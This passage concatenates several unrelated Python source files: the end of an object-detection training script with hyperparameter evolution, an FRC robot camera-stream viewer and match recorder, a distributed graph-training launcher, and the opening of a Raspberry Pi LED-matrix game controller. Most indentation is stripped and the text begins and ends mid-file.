parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
opt = parser.parse_known_args()[0] if known else parser.parse_args()
return opt
def main(opt):
set_logging(RANK)
if RANK in [-1, 0]:
print(colorstr('train: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_git_status()
check_requirements(exclude=['thop'])
# Resume
wandb_run = check_wandb_resume(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.safe_load(f)) # replace
opt.cfg, opt.weights, opt.resume = '', ckpt, True # reinstate
LOGGER.info(f'Resuming training from {ckpt}')
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = str(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok or opt.evolve))
# DDP mode
device = select_device(opt.device, batch_size=opt.batch_size)
if LOCAL_RANK != -1:
from datetime import timedelta
assert torch.cuda.device_count() > LOCAL_RANK, 'insufficient CUDA devices for DDP command'
torch.cuda.set_device(LOCAL_RANK)
device = torch.device('cuda', LOCAL_RANK)
dist.init_process_group(backend="nccl" if dist.is_nccl_available() else "gloo", timeout=timedelta(seconds=60))
assert opt.batch_size % WORLD_SIZE == 0, '--batch-size must be multiple of CUDA device count'
assert not opt.image_weights, '--image-weights argument is not compatible with DDP training'
# Train
if not opt.evolve:
train(opt.hyp, opt, device)
if WORLD_SIZE > 1 and RANK == 0:
_ = [print('Destroying process group... ', end=''), dist.destroy_process_group(), print('Done.')]
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
                'mosaic': (1, 0.0, 1.0), # image mosaic (probability)
'mixup': (1, 0.0, 1.0), # image mixup (probability)
'copy_paste': (1, 0.0, 1.0)} # segment copy-paste (probability)
with open(opt.hyp) as f:
hyp = yaml.safe_load(f) # load hyps dict
if 'anchors' not in hyp: # anchors commented in hyp.yaml
hyp['anchors'] = 3
assert LOCAL_RANK == -1, 'DDP mode not implemented for --evolve'
opt.noval, opt.nosave = True, True # only val/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system(f'gsutil cp gs://{opt.bucket}/evolve.txt .') # download evolve.txt if exists
for _ in range(opt.evolve): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() + 1E-6 # weights (sum > 0)
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
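# --- Added sketch (illustrative only, simplified from the evolve loop above) ---
# Mutates a hyp dict in the same spirit: per-key gain g, mutation probability mp,
# sigma s, multiplicative noise clipped to [0.3, 3.0], then clamped to the meta
# limits. Hypothetical helper, not called by the script; assumes every meta key
# is present in hyp.
def _mutate_sketch(hyp, meta, mp=0.8, s=0.2):
    import numpy as np
    g = np.array([m[0] for m in meta.values()])  # gains 0-1
    ng = len(meta)
    v = (g * (np.random.random(ng) < mp) * np.random.randn(ng) * np.random.random() * s + 1).clip(0.3, 3.0)
    out = dict(hyp)
    for i, k in enumerate(meta):
        out[k] = round(min(max(float(hyp[k] * v[i]), meta[k][1]), meta[k][2]), 5)
    return out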
def run(**kwargs):
# Usage: import train; train.run(imgsz=320, weights='yolov5m.pt')
opt = parse_opt(True)
for k, v in kwargs.items():
setattr(opt, k, v)
main(opt)
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
CameraStream.py | import os
import cv2
import urllib.request
import numpy as np
from networktables import NetworkTables
import time
from collections import deque
from threading import Thread
from queue import Queue
""" This code was written very roughly and quickly to try and improve camera
latency by running all stream manipulations on the Driver Station and not on
the roboRIO. It does indeed help!
Also, it records all match video streams and saves them on the Driver Station.
Please note that, for the reasons described above, this code contains some bugs
and is not completely stable, so it is highly recommended to study it and then
rewrite parts of it. """
MATCH_TYPE = {0: 'NA', 1: 'PM', 2: 'QM', 3: 'EM'}
class MatchRecorder:
def __init__(self, fps, timeout=1.0):
self.timeout = timeout
self.fps = fps
self.thread = None
        self.running = False  # update() reads this before start() has ever run; the old 'stopped' flag was never used
self.queue = None
self.last_prefix = ""
self.capture_index = 0
def start(self, output_path, fourcc, fps, frame):
self.running = True
self.queue = Queue()
os.makedirs("captures", exist_ok=True)
self.writer = cv2.VideoWriter(
output_path, fourcc, fps, (frame.shape[1], frame.shape[0]))
self.thread = Thread(target=self.run, args=())
self.thread.daemon = True
self.thread.start()
self.last_time = time.time()
return self
def run(self):
while self.running:
if not self.queue.empty():
frame = self.queue.get()
self.writer.write(frame)
else:
time.sleep(self.timeout)
def update(self, frame, is_match):
if not self.running and is_match:
match_type = table.getNumber('FMSInfo/MatchType', 0)
match_number = table.getNumber('FMSInfo/MatchNumber', 0)
replay_number = table.getNumber('FMSInfo/ReplayNumber', 0)
prefix = "{}{}-{}".format(MATCH_TYPE[match_type],
match_number, replay_number)
if prefix != self.last_prefix:
self.capture_index = 0
self.last_prefix = prefix
path = "captures/{}_{}.avi".format(prefix, self.capture_index)
self.start(
path,
cv2.VideoWriter_fourcc(
'M',
'J',
'P',
'G'),
self.fps,
frame)
self.capture_index += 1
if self.running and not is_match:
self.finish()
if self.running and time.time() - self.last_time >= 1. / self.fps:
self.queue.put(frame)
self.last_time = time.time()
def flush(self):
while not self.queue.empty():
frame = self.queue.get()
self.writer.write(frame)
def finish(self):
self.running = False
self.thread.join()
self.flush()
self.writer.release()
class VideoStream:
def __init__(self, path, max_delta=1.0):
self.cap = cv2.VideoCapture(path)
(self.grabbed, self.frame) = self.cap.read()
self.max_delta = max_delta
self.start_time = 0
def start(self):
self.running = True
Thread(target=self.run, args=()).start()
return self
def run(self):
while self.running:
self.start_time = time.time()
(self.grabbed, self.frame) = self.cap.read()
def read(self):
flag = time.time() - self.start_time > self.max_delta and self.max_delta > 0
return self.frame, flag
    def stop(self):
        self.running = False  # run() loops on self.running; setting 'stopped' never actually ended the thread
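# --- Added usage sketch (hypothetical, not executed) ---------------------------
# How the two classes are meant to cooperate. Assumes the NetworkTables 'table'
# global defined below is already connected, since MatchRecorder.update() reads
# FMSInfo from it to name the capture file.
def _record_for(stream_address, seconds=2.0, fps=15):
    stream = VideoStream(stream_address).start()
    rec = MatchRecorder(fps)
    t_end = time.time() + seconds
    frame = None
    while time.time() < t_end:
        frame, stale = stream.read()
        if frame is not None and not stale:
            rec.update(frame, is_match=True)   # lazily opens captures/<match>_<n>.avi
    if frame is not None:
        rec.update(frame, is_match=False)      # triggers finish(): flush + release
    stream.stop()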
# ---------- MAIN CODE ----------
WINDOW_NAME = '3339 Camera Feed'
WINDOW_WIDTH = 320 * 2
WINDOW_HEIGHT = 240 * 2
SCREEN_WIDTH = 320
SCREEN_HEIGHT = 240
# ARROW PARAMS
ARROW_LENGTH = 40 # in pixels
PRINT_DISTANCE_FROM_SIDE = 20 # in pixels
PRINT_DISTANCE_FROM_TOP = 10 # in pixels
LEFT_ARROW_TOP = (PRINT_DISTANCE_FROM_SIDE, PRINT_DISTANCE_FROM_TOP)
LEFT_ARROW_DOWN = (
PRINT_DISTANCE_FROM_SIDE,
PRINT_DISTANCE_FROM_TOP +
ARROW_LENGTH)
RIGHT_ARROW_TOP = (
SCREEN_WIDTH -
PRINT_DISTANCE_FROM_SIDE,
PRINT_DISTANCE_FROM_TOP)
RIGHT_ARROW_DOWN = (
SCREEN_WIDTH -
PRINT_DISTANCE_FROM_SIDE,
PRINT_DISTANCE_FROM_TOP +
ARROW_LENGTH)
ARROW_THICKNESS = 4
FORWARD_COLOR = (0, 255, 0)
BACKWARD_COLOR = (0, 0, 255)
# GEAR PARAMS
LEFT_GEAR_POINT = (
PRINT_DISTANCE_FROM_SIDE -
15,
SCREEN_HEIGHT -
PRINT_DISTANCE_FROM_TOP)
GEAR_THICKNESS = 4
POWER_COLOR = (210, 44, 44)
SPEED_COLOR = (239, 10, 247)
STREAM_PORT = "5810"
STREAM_IP = "10.33.39.2"
print('Connecting to network tables...')
NetworkTables.initialize(STREAM_IP) # router
# NetworkTables.initialize('169.254.223.10') #roborio
table = NetworkTables.getTable('SmartDashboard')
print('Connected to network tables...')
cv2.namedWindow(WINDOW_NAME, cv2.WINDOW_NORMAL)
cv2.resizeWindow(WINDOW_NAME, WINDOW_WIDTH, WINDOW_HEIGHT)
STREAM_ADDRESS = 'http://' + STREAM_IP + ':' + STREAM_PORT + '/stream.mjpg'
print('Connecting to camera stream...')
stream = VideoStream(STREAM_ADDRESS).start()
print('Connected to camera stream.')
fps = 0
FRAME_SAMPLE = 5
last_time = time.time()
last_frame = 0
# Capture
CAPTURE_FPS = 15
try:
recorder = MatchRecorder(CAPTURE_FPS)
except Exception as e:
print(e)
table.putBoolean('RecordKeyEvent', False)
while True:
frame, flag = stream.read()
direction = table.getString('Game/Direction', 'FORWARD')
gear = table.getString('Game/Gear', 'SPEED_GEAR')
if direction == 'BACKWARD':
# frame = cv2.flip(frame, 0)
cv2.arrowedLine(
frame,
LEFT_ARROW_TOP,
LEFT_ARROW_DOWN,
BACKWARD_COLOR,
ARROW_THICKNESS)
cv2.arrowedLine(
frame,
RIGHT_ARROW_TOP,
RIGHT_ARROW_DOWN,
BACKWARD_COLOR,
ARROW_THICKNESS)
elif direction == 'FORWARD':
frame = cv2.flip(frame, -1)
cv2.arrowedLine(
frame,
LEFT_ARROW_DOWN,
LEFT_ARROW_TOP,
FORWARD_COLOR,
ARROW_THICKNESS)
cv2.arrowedLine(
frame,
RIGHT_ARROW_DOWN,
RIGHT_ARROW_TOP,
FORWARD_COLOR,
ARROW_THICKNESS)
if gear == 'SPEED_GEAR':
cv2.putText(
frame,
'S',
LEFT_GEAR_POINT,
cv2.FONT_HERSHEY_SIMPLEX,
1.690,
SPEED_COLOR,
GEAR_THICKNESS)
elif gear == 'POWER_GEAR':
cv2.putText(
frame,
'P',
LEFT_GEAR_POINT,
cv2.FONT_HERSHEY_SIMPLEX,
1.690,
POWER_COLOR,
GEAR_THICKNESS)
# Calculate FPS
current_frame = stream.cap.get(cv2.CAP_PROP_POS_FRAMES)
if current_frame - last_frame >= FRAME_SAMPLE:
current_time = time.time()
fps = (current_frame - last_frame) / (current_time - last_time)
last_time = current_time
last_frame = current_frame
cv2.putText(frame, str(round(fps, 2)), (285, 230),
cv2.FONT_HERSHEY_SIMPLEX, 0.3, (255, 255, 255))
try:
cv2.imshow(WINDOW_NAME, frame)
except BaseException:
stream.stop()
stream = VideoStream(STREAM_ADDRESS).start()
try:
recorder.finish()
except Exception as e:
print(e)
if table.getBoolean('Recording/VisionEnabled', False):
cv2.circle(frame, (140, 10), 5, (0, 255, 0), -1)
else:
cv2.circle(frame, (140, 10), 5, (255, 255, 255), -1)
timestamp = table.getNumber('Recording/Timestamp', 0)
cv2.putText(frame, "{0:0=3d}".format(int(timestamp)),
(155, 14), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255))
try:
recorder.update(frame, table.getBoolean('Recording/IsMatch', True))
except Exception as e:
print(e)
try:
recorder.finish()
except Exception as e:
print(e)
if cv2.waitKey(1) == 27:
exit(0)
|
main.py | from helper.parser import *
import random
import torch.multiprocessing as mp
from helper.utils import *
import train
import warnings
if __name__ == '__main__':
args = create_parser()
if args.fix_seed is False:
if args.parts_per_node < args.n_partitions:
warnings.warn('Please enable `--fix-seed` for multi-node training.')
args.seed = random.randint(0, 1 << 31)
if args.graph_name == '':
if args.inductive:
args.graph_name = '%s-%d-%s-%s-induc' % (args.dataset, args.n_partitions,
args.partition_method, args.partition_obj)
else:
args.graph_name = '%s-%d-%s-%s-trans' % (args.dataset, args.n_partitions,
args.partition_method, args.partition_obj)
if args.skip_partition:
if args.n_feat == 0 or args.n_class == 0 or args.n_train == 0:
warnings.warn('Specifying `--n-feat`, `--n-class` and `--n-train` saves data loading time.')
g, n_feat, n_class = load_data(args.dataset)
args.n_feat = n_feat
args.n_class = n_class
args.n_train = g.ndata['train_mask'].int().sum().item()
else:
g, n_feat, n_class = load_data(args.dataset)
if args.node_rank == 0:
if args.inductive:
graph_partition(g.subgraph(g.ndata['train_mask']), args)
else:
graph_partition(g, args)
args.n_class = n_class
args.n_feat = n_feat
args.n_train = g.ndata['train_mask'].int().sum().item()
print(args)
if args.backend == 'gloo':
processes = []
if 'CUDA_VISIBLE_DEVICES' in os.environ:
devices = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
else:
n = torch.cuda.device_count()
devices = [f'{i}' for i in range(n)]
mp.set_start_method('spawn', force=True)
start_id = args.node_rank * args.parts_per_node
for i in range(start_id, min(start_id + args.parts_per_node, args.n_partitions)):
os.environ['CUDA_VISIBLE_DEVICES'] = devices[i % len(devices)]
p = mp.Process(target=train.init_processes, args=(i, args.n_partitions, args))
p.start()
processes.append(p)
for p in processes:
p.join()
elif args.backend == 'nccl':
raise NotImplementedError
elif args.backend == 'mpi':
raise NotImplementedError
else:
raise ValueError
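# Added note (sketch, not in the original script): the gloo branch above pins
# each worker to a single GPU by overwriting CUDA_VISIBLE_DEVICES *before*
# mp.Process starts, so inside train.init_processes the one visible device is
# always cuda:0, regardless of which physical GPU was assigned to that rank.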
|
games_pi.py | # WS2812 LED Matrix Gamecontrol (Tetris, Snake, Pong)
# by M Oehler
# https://hackaday.io/project/11064-raspberry-pi-retro-gaming-led-display
# ported from
# Tetromino (a Tetris clone)
# By Al Sweigart al@inventwithpython.com
# http://inventwithpython.com/pygame
# Released under a "Simplified BSD" license
import random, time, sys, socket, threading, queue, socketserver, os
from PIL import Image # tested with pillow-6.2.1
# If PI = False the script runs in simulation mode using the pygame lib
PI = True
import pygame
from pygame.locals import *
from random import randint # random numbers
import datetime
if PI:
import serial
from luma.led_matrix.device import max7219
from luma.core.interface.serial import spi, noop
from luma.core.render import canvas
from luma.core.legacy.font import proportional, SINCLAIR_FONT, TINY_FONT, CP437_FONT
from luma.core.legacy import show_message, text
import asyncio
from evdev import InputDevice, categorize, ecodes # PS4 inputs
import evdev
from select import select
# only modify these two values for size adaptation!
PIXEL_X=10
PIXEL_Y=20
#TODO implement MineSweeper?
MAX2719_DISPLAYS=4 # number of cascaded displays
MAX2719_ORIENTATION=90 # Corrects block orientation when wired vertically choices=[0, 90, -90]
MAX2719_ROTATION=0 # Rotate display 0=0°, 1=90°, 2=180°, 3=270° choices=[0, 1, 2, 3]
#PORT_NAME = "/dev/ttyAMA0"
PORT_NAME = "/dev/ttyS0"
SIZE= 20
FPS = 15
BOXSIZE = 20
WINDOWWIDTH = BOXSIZE * PIXEL_X
WINDOWHEIGHT = BOXSIZE * PIXEL_Y
BOARDWIDTH = PIXEL_X
BOARDHEIGHT = PIXEL_Y
BLANK = '.'
MOVESIDEWAYSFREQ = 0.15
MOVEDOWNFREQ = 0.15
FALLING_SPEED = 0.8
# R G B
WHITE = (255, 255, 255)
GRAY = (185, 185, 185)
BLACK = ( 0, 0, 0)
RED = (255, 0, 0)
LIGHTRED = (175, 20, 20)
GREEN = ( 0, 255, 0)
LIGHTGREEN = ( 20, 175, 20)
BLUE = ( 0, 0, 255)
LIGHTBLUE = ( 20, 20, 175)
YELLOW = (255, 255, 0)
LIGHTYELLOW = (175, 175, 20)
CYAN = ( 0, 255, 255)
MAGENTA = (255, 0, 255)
ORANGE = (255, 100, 0)
SCORES =(0,40,100,300,1200)
BORDERCOLOR = BLUE
BGCOLOR = BLACK
TEXTCOLOR = WHITE
TEXTSHADOWCOLOR = GRAY
COLORS = (BLUE,GREEN,RED,YELLOW,CYAN,MAGENTA,ORANGE)
LIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW)
#assert len(COLORS) == len(LIGHTCOLORS) # each color must have light color
# constants defining the keys/buttons on the controller
BUTTON_LEFT=0
BUTTON_RIGHT=1
BUTTON_UP=2
BUTTON_DOWN=3
BUTTON_BLUE=4
BUTTON_GREEN=5
BUTTON_RED=6
BUTTON_YELLOW=7
# Sony PS4 Controller Codes
# using evdev now; should be better to use pygame.joystick, but could not get this to work in the headless setup
PS4BTN_X=304
PS4BTN_CIRCLE=305
PS4BTN_TRIANGLE=307
PS4BTN_QUADRAT=308
PS4BTN_R2=313
PS4BTN_R1=311
PS4BTN_L2=312
PS4BTN_L1=310
#maps the evdev button code to the in-game button event name
# PS4 version --> maps a PS4 button to the in-game event name
# using predefined constants from evdev
if PI:
# controllerEventMapper = {
# BTN_SOUTH : BUTTON_DOWN,
# BTN_EAST : BUTTON_RIGHT,
# BTN_WEST : BUTTON_LEFT,
# BTN_NORTH: BUTTON_UP,
# BTN_TL : BUTTON_YELLOW,
# BTN_TL2 : BUTTON_RED,
# BTN_TR : BUTTON_GREEN,
# BTN_TR2 : BUTTON_BLUE
# }
controllerEventMapper = {
PS4BTN_X : BUTTON_DOWN,
PS4BTN_CIRCLE : BUTTON_RIGHT,
PS4BTN_QUADRAT : BUTTON_LEFT,
PS4BTN_TRIANGLE : BUTTON_UP,
PS4BTN_L1 : BUTTON_YELLOW,
PS4BTN_L2 : BUTTON_RED,
PS4BTN_R1 : BUTTON_GREEN,
PS4BTN_R2 : BUTTON_BLUE
}
keyboardEventMapper = {
pygame.K_DOWN : BUTTON_DOWN,
pygame.K_RIGHT : BUTTON_RIGHT,
pygame.K_LEFT : BUTTON_LEFT,
pygame.K_UP: BUTTON_UP,
pygame.K_4 : BUTTON_YELLOW,
pygame.K_3 : BUTTON_RED,
pygame.K_2 : BUTTON_GREEN,
pygame.K_1 : BUTTON_BLUE
}
#constants for the communication with the external display driver (Arduino) - only 4 commands are currently used
#COMMANDBYTE_SETBRIGHTNESS = 22 # command to set the LED Brightness of the Main Display; Followed by 1 Byte: Brightness value
COMMANDBYTE_DRAWPIXELRGB = 24 # command to set a pixel to an RGB color; followed by 5 bytes: X-pos, Y-pos, R-Value, G-Value, B-Value
COMMANDBYTE_DRAWPIXELCOLOR = 26 # command to set a pixel to a color from the internal palette; followed by 3 bytes: X-pos, Y-pos, Color-Index
#COMMANDBYTE_FULLSCREEN = 28 # command to set the full screen, followed by 200 bytes, one palette index per pixel
COMMANDBYTE_UPDATESCREEN = 30 # command to update the screen
COMMANDBYTE_CLEARSCREEN = 32 # command to clear the screen
# constants for the colors in the arduino matrix
COLORINDEX_BLUE = 0
COLORINDEX_GREEN = 1
COLORINDEX_RED = 2
COLORINDEX_YELLOW = 3
COLORINDEX_CYAN = 4
COLORINDEX_MAGENTA = 5
COLORINDEX_ORANGE = 6
COLORINDEX_WHITE = 7
COLORINDEX_BLACK = 8
TEMPLATEWIDTH = 5
TEMPLATEHEIGHT = 5
S_SHAPE_TEMPLATE = [['.....',
'.....',
'..OO.',
'.OO..',
'.....'],
['.....',
'..O..',
'..OO.',
'...O.',
'.....']]
Z_SHAPE_TEMPLATE = [['.....',
'.....',
'.OO..',
'..OO.',
'.....'],
['.....',
'..O..',
'.OO..',
'.O...',
'.....']]
I_SHAPE_TEMPLATE = [['..O..',
'..O..',
'..O..',
'..O..',
'.....'],
['.....',
'.....',
'OOOO.',
'.....',
'.....']]
O_SHAPE_TEMPLATE = [['.....',
'.....',
'.OO..',
'.OO..',
'.....']]
J_SHAPE_TEMPLATE = [['.....',
'.O...',
'.OOO.',
'.....',
'.....'],
['.....',
'..OO.',
'..O..',
'..O..',
'.....'],
['.....',
'.....',
'.OOO.',
'...O.',
'.....'],
['.....',
'..O..',
'..O..',
'.OO..',
'.....']]
L_SHAPE_TEMPLATE = [['.....',
'...O.',
'.OOO.',
'.....',
'.....'],
['.....',
'..O..',
'..O..',
'..OO.',
'.....'],
['.....',
'.....',
'.OOO.',
'.O...',
'.....'],
['.....',
'.OO..',
'..O..',
'..O..',
'.....']]
T_SHAPE_TEMPLATE = [['.....',
'..O..',
'.OOO.',
'.....',
'.....'],
['.....',
'..O..',
'..OO.',
'..O..',
'.....'],
['.....',
'.....',
'.OOO.',
'..O..',
'.....'],
['.....',
'..O..',
'.OO..',
'..O..',
'.....']]
PIECES = {'S': S_SHAPE_TEMPLATE,
'Z': Z_SHAPE_TEMPLATE,
'I': I_SHAPE_TEMPLATE,
'J': J_SHAPE_TEMPLATE,
'L': L_SHAPE_TEMPLATE,
'O': O_SHAPE_TEMPLATE,
'T': T_SHAPE_TEMPLATE}
PIECES_ORDER = {'S': 0,'Z': 1,'I': 2,'J': 3,'L': 4,'O': 5,'T': 6}
# snake constants #
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
HEAD = 0 # syntactic sugar: index of the worm's head
# clock font: 3x5 digits, three column-bytes per digit (bit i = pixel in row i) #
clock_font = [
    0x1F, 0x11, 0x1F,  # 0
    0x00, 0x00, 0x1F,  # 1
    0x1D, 0x15, 0x17,  # 2
    0x15, 0x15, 0x1F,  # 3
    0x07, 0x04, 0x1F,  # 4
    0x17, 0x15, 0x1D,  # 5
    0x1F, 0x15, 0x1D,  # 6
    0x01, 0x01, 0x1F,  # 7
    0x1F, 0x15, 0x1F,  # 8
    0x17, 0x15, 0x1F]  # 9
# serial port pi #
if PI:
serport=serial.Serial(PORT_NAME,baudrate=250000,timeout=3.0)
spiPort = spi(port=0, device=0, gpio=noop())
MAX2719device = max7219(spiPort, cascaded=MAX2719_DISPLAYS, block_orientation=MAX2719_ORIENTATION,
rotate=MAX2719_ROTATION or 0, blocks_arranged_in_reverse_order=False)
#creates object 'gamepad' to store the data
#gamepad = InputDevice(GAMEPAD_DEVICE)
#print(gamepad)
else:
    MAX2719device = 0 # placeholder; no secondary MAX7219 display in simulation mode
# key server for controller #
#TODO simply use pygame events?
QKEYDOWN=0
QKEYUP=1
myQueue = queue.Queue()
mask = bytearray([1,2,4,8,16,32,64,128])
class qEvent:
def __init__(self, key, type):
self.key = key
self.type = type
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
oldstr=b'\x80' #create event on connection start (0x80 != 0x00)
while RUNNING:
data = self.request.recv(1)
#cur_thread = threading.current_thread()
#response = bytes("{}: {}".format(cur_thread.name, data), 'ascii')
if data:
if data!=oldstr:
#print(str(time.time()) + ' -- ' + str(oldstr))
for i in range (0,8):
                        if (data[0]&mask[i]) != (oldstr[0]&mask[i]): # compare the masked bits as ints; bytes(n) built n zero bytes and only worked by accident
                            if (data[0]&mask[i]):
myQueue.put(qEvent(i,QKEYDOWN))
else:
myQueue.put(qEvent(i,QKEYUP))
oldstr = data
#print(data)
#self.request.sendall(response)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
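# --- Added sketch (hypothetical): the 1-byte protocol that handle() decodes ----
# Bit i of the byte means "button i is currently held"; a sender could encode
# its state like this (this helper is not used anywhere in the script):
def _encodeButtons(pressed):
    state = 0
    for i in pressed:          # pressed: iterable of button indices 0..7
        state |= mask[i]       # mask is the module-level bytearray of bit masks
    return bytes([state])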
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(bytes(message, 'ascii'))
response = str(sock.recv(1024), 'ascii')
print("Received: {}".format(response))
finally:
sock.close()
# returns the first device that does not contain Touchpad or motion (PS4)
def findController():
for fname in evdev.list_devices():
dev = evdev.InputDevice(fname)
print(dev.name)
if "Touchpad" in dev.name:
next
elif "Motion Sensor" in dev.name:
next
else:
return dev
def gamePadListener():
gamePadConnected = False
while True:
if gamePadConnected==False:
gamepad = findController()
if(gamepad):
print(gamepad)
gamePadConnected=True
else:
time.sleep(0.5)
else: # gamepad is available --> read it
r,w,x = select([gamepad], [], [],0)
if r:
try:
for event in gamepad.read():
#filters by event type
if event.type == ecodes.EV_KEY:
#print(event)
if event.value == 1: # button pressed
thisEventType = QKEYDOWN
else:
thisEventType = QKEYUP
# try to get the correct key mapping
mappedEventCode = controllerEventMapper.get(event.code,-1)
if mappedEventCode != -1: # only insert when button has a mapping
myQueue.put(qEvent(mappedEventCode,thisEventType))
except OSError:
time.sleep(0.5)
gamePadConnected=False
continue
time.sleep(0.01)
def pollKeyboardInput():
for event in pygame.event.get():
#if event.type == pygame.QUIT: # Usually wise to be able to close your program.
# raise SystemExit
if event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:
if event.type == pygame.KEYDOWN:
thisEventType = QKEYDOWN
else:
thisEventType = QKEYUP
mappedEventCode = keyboardEventMapper.get(event.key,-1)
if mappedEventCode != -1: # only insert when button has a mapping
myQueue.put(qEvent(mappedEventCode,thisEventType))
# main #
SCREEN_CLOCK = 0
SCREEN_TETRIS = 1
SCREEN_SNAKE = 2
SCREEN_PONG = 3
def main():
global FPSCLOCK, DISPLAYSURF, BASICFONT, BIGFONT
global RUNNING
RUNNING=True
if not PI:
pygame.init()
FPSCLOCK = pygame.time.Clock()
DISPLAYSURF = pygame.display.set_mode((PIXEL_X*SIZE, PIXEL_Y*SIZE))
BASICFONT = pygame.font.Font('freesansbold.ttf', 18)
BIGFONT = pygame.font.Font('freesansbold.ttf', 100)
pygame.display.set_caption('Pi Games')
else:
#MAX2719device.brightness(1) TODO needs fix
MAX2719device.clear()
#MAX2719device.show_message("Waiting for controller...", font=proportional(CP437_FONT),delay=0.015)
gamePadThread = threading.Thread(target=gamePadListener,daemon=True)
gamePadThread.start()
# Port 0 means to select an arbitrary unused port
HOST, PORT = '', 4711
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
